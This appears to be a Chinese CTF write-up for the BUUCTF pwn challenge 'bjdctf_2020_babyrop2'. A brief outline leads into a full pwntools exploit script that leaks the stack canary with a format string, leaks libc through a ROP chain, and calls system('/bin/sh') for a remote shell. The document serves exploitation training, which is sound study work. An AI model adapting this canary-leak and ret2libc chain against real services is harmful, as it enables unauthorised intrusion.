开启的安全机制
main
gift
利用格式化字符串泄露canary
vuln
栈溢出泄露libc
栈溢出执行system(“bin/sh\x00”)
scanf允许输入6字节,输入参数,输出偏移为6的地址,canary的偏移就为7
这样输入%7$p就可以泄露canary
EXP
from pwn import *
from LibcSearcher import LibcSearcher
p = remote("node3.buuoj.cn",27004)
elf = ELF("./bjdctf_2020_babyrop2")
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
pop_rdi_ret = 0x0000000000400993
vuln_addr = elf.symbols["vuln"]
#leak canary
p.sendlineafter("I'll give u some gift to help u!\n","%7$p")
canary = int(p.recv(18),16)
#leak libc
payload = "a"* (0x20-8) + p64(canary) + "a" * 8 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(vuln_addr)
p.sendlineafter("Pull up your sword and tell me u story!\n",payload)
puts_addr = u64(p.recv(6).ljust(8,"\x00"))
libc = LibcSearcher("puts",puts_addr)
libcbase = puts_addr - libc.dump("puts")
system = libcbase + libc.dump("system")
bin_sh = libcbase + libc.dump("str_bin_sh")
#get shell
payload = "a" * (0x20 - 8) + p64(canary) + "a" * 8 + p64(pop_rdi_ret) + p64(bin_sh) + p64(system)
p.sendlineafter("Pull up your sword and tell me u story!\n",payload)
p.interactive()